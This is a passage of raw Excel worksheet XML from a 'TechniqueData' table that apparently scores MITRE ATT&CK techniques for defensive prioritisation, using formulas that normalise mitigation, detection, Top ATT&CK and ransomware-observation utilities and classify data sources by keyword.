        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS435" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT435" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU43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18.789933106575965</v>
      </c>
    </row>
    <row r="436" spans="1:47" ht="34">
      <c r="A436" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B436" s="37">
        <f t="shared" si="6"/>
        <v>354.03333333333336</v>
      </c>
      <c r="C436" s="37" t="s">
        <v>1535</v>
      </c>
      <c r="D436" s="50" t="s">
        <v>1531</v>
      </c>
      <c r="E436" s="37" t="s">
        <v>1536</v>
      </c>
      <c r="F436" s="37">
        <v>1</v>
      </c>
      <c r="G436" s="37">
        <v>1</v>
      </c>
      <c r="H436" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I436" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J436" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K436" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L436" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M436" s="37">
        <v>0</v>
      </c>
      <c r="N436" s="56">
        <v>0</v>
      </c>
      <c r="O436" s="56">
        <v>0</v>
      </c>
      <c r="P436" s="56">
        <v>0</v>
      </c>
      <c r="Q436" s="56">
        <v>0</v>
      </c>
      <c r="R436" s="57" t="s">
        <v>1532</v>
      </c>
      <c r="S436" s="57">
        <v>6</v>
      </c>
      <c r="T436" s="57" t="s">
        <v>1533</v>
      </c>
      <c r="U436" s="57">
        <v>5</v>
      </c>
      <c r="V436" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190478</v>
      </c>
      <c r="W436" s="37">
        <v>11</v>
      </c>
      <c r="X436" s="37">
        <v>0.2</v>
      </c>
      <c r="Y436" s="37">
        <v>0.2</v>
      </c>
      <c r="Z436" s="37">
        <v>0</v>
      </c>
      <c r="AA436" s="37">
        <v>0</v>
      </c>
      <c r="AB436" s="37">
        <v>0</v>
      </c>
      <c r="AC436" s="37"/>
      <c r="AD436" s="50" t="s">
        <v>957</v>
      </c>
      <c r="AE436" s="37" t="str" cm="1">
        <f t="array" ref="AE436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD436)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF436" s="37">
        <v>432</v>
      </c>
      <c r="AG436" s="37" t="str" cm="1">
        <f t="array" ref="AG436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD436)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH436" s="37">
        <v>432</v>
      </c>
      <c r="AI436" s="37" t="str" cm="1">
        <f t="array" ref="AI436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD436)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ436" s="37">
        <v>432</v>
      </c>
      <c r="AK436" s="37" t="str" cm="1">
        <f t="array" ref="AK436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD436)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL436" s="37">
        <v>432</v>
      </c>
      <c r="AM436" s="37" t="str" cm="1">
        <f t="array" ref="AM436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD436)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN436" s="37">
        <v>0</v>
      </c>
      <c r="AO436" s="37">
        <v>1</v>
      </c>
      <c r="AP436" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ436" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>118.01111111111112</v>
      </c>
      <c r="AR436" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS436" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT436" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU43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2.8335978835978834</v>
      </c>
    </row>
    <row r="437" spans="1:47" ht="17">
      <c r="A437" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B437" s="37">
        <f t="shared" si="6"/>
        <v>173.3</v>
      </c>
      <c r="C437" s="37" t="s">
        <v>1537</v>
      </c>
      <c r="D437" s="50" t="s">
        <v>1531</v>
      </c>
      <c r="E437" s="37" t="s">
        <v>1538</v>
      </c>
      <c r="F437" s="37">
        <v>1</v>
      </c>
      <c r="G437" s="37">
        <v>1</v>
      </c>
      <c r="H437" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I437" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J437" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K437" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L437" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M437" s="37">
        <v>0</v>
      </c>
      <c r="N437" s="56">
        <v>0</v>
      </c>
      <c r="O437" s="56">
        <v>0</v>
      </c>
      <c r="P437" s="56">
        <v>0</v>
      </c>
      <c r="Q437" s="56">
        <v>0</v>
      </c>
      <c r="R437" s="57"/>
      <c r="S437" s="57">
        <v>0</v>
      </c>
      <c r="T437" s="57"/>
      <c r="U437" s="57">
        <v>0</v>
      </c>
      <c r="V437" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W437" s="37">
        <v>0</v>
      </c>
      <c r="X437" s="37">
        <v>0</v>
      </c>
      <c r="Y437" s="37">
        <v>0</v>
      </c>
      <c r="Z437" s="37">
        <v>0</v>
      </c>
      <c r="AA437" s="37">
        <v>0</v>
      </c>
      <c r="AB437" s="37">
        <v>0</v>
      </c>
      <c r="AC437" s="37"/>
      <c r="AD437" s="50" t="s">
        <v>1539</v>
      </c>
      <c r="AE437" s="37" t="str" cm="1">
        <f t="array" ref="AE437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD437)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF437" s="37">
        <v>433</v>
      </c>
      <c r="AG437" s="37" t="str" cm="1">
        <f t="array" ref="AG437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD437)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH437" s="37">
        <v>433</v>
      </c>
      <c r="AI437" s="37" t="str" cm="1">
        <f t="array" ref="AI437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD437)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ437" s="37">
        <v>433</v>
      </c>
      <c r="AK437" s="37" t="str" cm="1">
        <f t="array" ref="AK437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD437)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL437" s="37">
        <v>433</v>
      </c>
      <c r="AM437" s="37" t="str" cm="1">
        <f t="array" ref="AM437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD437)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN437" s="37">
        <v>0</v>
      </c>
      <c r="AO437" s="37">
        <v>1</v>
      </c>
      <c r="AP437" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ437" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>57.766666666666673</v>
      </c>
      <c r="AR437" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS437" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT437" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU43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1.3992063492063493</v>
      </c>
    </row>
    <row r="438" spans="1:47" ht="17">
      <c r="A438" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B438" s="37">
        <f t="shared" si="6"/>
        <v>190.24285714285713</v>
      </c>
      <c r="C438" s="37" t="s">
        <v>1540</v>
      </c>
      <c r="D438" s="50" t="s">
        <v>1531</v>
      </c>
      <c r="E438" s="37" t="s">
        <v>1541</v>
      </c>
      <c r="F438" s="37">
        <v>1</v>
      </c>
      <c r="G438" s="37">
        <v>1</v>
      </c>
      <c r="H438" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I438" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J438" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K438" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L438" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M438" s="37">
        <v>0</v>
      </c>
      <c r="N438" s="56">
        <v>0</v>
      </c>
      <c r="O438" s="56">
        <v>0</v>
      </c>
      <c r="P438" s="56">
        <v>0</v>
      </c>
      <c r="Q438" s="56">
        <v>2</v>
      </c>
      <c r="R438" s="57"/>
      <c r="S438" s="57">
        <v>0</v>
      </c>
      <c r="T438" s="57"/>
      <c r="U438" s="57">
        <v>0</v>
      </c>
      <c r="V438" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W438" s="37">
        <v>0</v>
      </c>
      <c r="X438" s="37">
        <v>0</v>
      </c>
      <c r="Y438" s="37">
        <v>0</v>
      </c>
      <c r="Z438" s="37">
        <v>2</v>
      </c>
      <c r="AA438" s="37">
        <v>0.02</v>
      </c>
      <c r="AB438" s="37">
        <v>0.02</v>
      </c>
      <c r="AC438" s="37"/>
      <c r="AD438" s="50" t="s">
        <v>1539</v>
      </c>
      <c r="AE438" s="37" t="str" cm="1">
        <f t="array" ref="AE438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD438)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF438" s="37">
        <v>434</v>
      </c>
      <c r="AG438" s="37" t="str" cm="1">
        <f t="array" ref="AG438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD438)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH438" s="37">
        <v>434</v>
      </c>
      <c r="AI438" s="37" t="str" cm="1">
        <f t="array" ref="AI438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD438)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ438" s="37">
        <v>434</v>
      </c>
      <c r="AK438" s="37" t="str" cm="1">
        <f t="array" ref="AK438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD438)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL438" s="37">
        <v>434</v>
      </c>
      <c r="AM438" s="37" t="str" cm="1">
        <f t="array" ref="AM438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD438)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN438" s="37">
        <v>0</v>
      </c>
      <c r="AO438" s="37">
        <v>1</v>
      </c>
      <c r="AP438" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ438" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>63.414285714285711</v>
      </c>
      <c r="AR438" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS438" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT438" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU43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1.5336734693877547</v>
      </c>
    </row>
    <row r="439" spans="1:47" ht="51">
      <c r="A439" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B439" s="37">
        <f t="shared" si="6"/>
        <v>399.42527719047627</v>
      </c>
      <c r="C439" s="37" t="s">
        <v>1542</v>
      </c>
      <c r="D439" s="50" t="s">
        <v>1543</v>
      </c>
      <c r="E439" s="37"/>
      <c r="F439" s="37">
        <v>1</v>
      </c>
      <c r="G439" s="37">
        <v>0</v>
      </c>
      <c r="H439" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I439" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J439" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K439" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L439" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M439" s="37">
        <v>3.1803999999999999E-2</v>
      </c>
      <c r="N439" s="56">
        <v>0</v>
      </c>
      <c r="O439" s="56">
        <v>1</v>
      </c>
      <c r="P439" s="56">
        <v>0</v>
      </c>
      <c r="Q439" s="56">
        <v>0</v>
      </c>
      <c r="R439" s="57" t="s">
        <v>1039</v>
      </c>
      <c r="S439" s="57">
        <v>5</v>
      </c>
      <c r="T439" s="57" t="s">
        <v>1040</v>
      </c>
      <c r="U439" s="57">
        <v>10</v>
      </c>
      <c r="V439" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14761890476190478</v>
      </c>
      <c r="W439" s="37">
        <v>15</v>
      </c>
      <c r="X439" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y439" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z439" s="37">
        <v>1</v>
      </c>
      <c r="AA439" s="37">
        <v>0.01</v>
      </c>
      <c r="AB439" s="37">
        <v>0.01</v>
      </c>
      <c r="AC439" s="37"/>
      <c r="AD439" s="50" t="s">
        <v>1544</v>
      </c>
      <c r="AE439" s="37" t="str" cm="1">
        <f t="array" ref="AE439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD439)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF439" s="37">
        <v>435</v>
      </c>
      <c r="AG439" s="37" t="str" cm="1">
        <f t="array" ref="AG439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD439)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH439" s="37">
        <v>435</v>
      </c>
      <c r="AI439" s="37" t="str" cm="1">
        <f t="array" ref="AI439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD439)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ439" s="37">
        <v>435</v>
      </c>
      <c r="AK439" s="37" t="str" cm="1">
        <f t="array" ref="AK439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD439)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL439" s="37">
        <v>435</v>
      </c>
      <c r="AM439" s="37" t="str" cm="1">
        <f t="array" ref="AM439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD439)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN439" s="37">
        <v>0</v>
      </c>
      <c r="AO439" s="37">
        <v>0</v>
      </c>
      <c r="AP439" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ439" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>133.14175906349209</v>
      </c>
      <c r="AR439" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS439" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT439" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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40" spans="1:47" ht="51">
      <c r="A440" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B440" s="37">
        <f t="shared" si="6"/>
        <v>361.46403642857143</v>
      </c>
      <c r="C440" s="37" t="s">
        <v>1545</v>
      </c>
      <c r="D440" s="50" t="s">
        <v>1543</v>
      </c>
      <c r="E440" s="37" t="s">
        <v>1546</v>
      </c>
      <c r="F440" s="37">
        <v>1</v>
      </c>
      <c r="G440" s="37">
        <v>0</v>
      </c>
      <c r="H440" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I440" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J440" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K440" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L440" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M440" s="37">
        <v>0</v>
      </c>
      <c r="N440" s="56">
        <v>0</v>
      </c>
      <c r="O440" s="56">
        <v>1</v>
      </c>
      <c r="P440" s="56">
        <v>0</v>
      </c>
      <c r="Q440" s="56">
        <v>2</v>
      </c>
      <c r="R440" s="57" t="s">
        <v>1039</v>
      </c>
      <c r="S440" s="57">
        <v>5</v>
      </c>
      <c r="T440" s="57" t="s">
        <v>1040</v>
      </c>
      <c r="U440" s="57">
        <v>10</v>
      </c>
      <c r="V440" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1571427142857143</v>
      </c>
      <c r="W440" s="37">
        <v>15</v>
      </c>
      <c r="X440" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y440" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z440" s="37">
        <v>3</v>
      </c>
      <c r="AA440" s="37">
        <v>0.03</v>
      </c>
      <c r="AB440" s="37">
        <v>0.03</v>
      </c>
      <c r="AC440" s="37"/>
      <c r="AD440" s="50" t="s">
        <v>1544</v>
      </c>
      <c r="AE440" s="37" t="str" cm="1">
        <f t="array" ref="AE440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD440)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF440" s="37">
        <v>436</v>
      </c>
      <c r="AG440" s="37" t="str" cm="1">
        <f t="array" ref="AG440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD440)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH440" s="37">
        <v>436</v>
      </c>
      <c r="AI440" s="37" t="str" cm="1">
        <f t="array" ref="AI440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD440)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ440" s="37">
        <v>436</v>
      </c>
      <c r="AK440" s="37" t="str" cm="1">
        <f t="array" ref="AK440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD440)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL440" s="37">
        <v>436</v>
      </c>
      <c r="AM440" s="37" t="str" cm="1">
        <f t="array" ref="AM440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD440)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN440" s="37">
        <v>0</v>
      </c>
      <c r="AO440" s="37">
        <v>0</v>
      </c>
      <c r="AP440" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ440" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>120.48801214285714</v>
      </c>
      <c r="AR440" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS440" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT440" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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41" spans="1:47" ht="51">
      <c r="A441" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B441" s="37">
        <f t="shared" si="6"/>
        <v>1170.1640358571428</v>
      </c>
      <c r="C441" s="37" t="s">
        <v>1547</v>
      </c>
      <c r="D441" s="50" t="s">
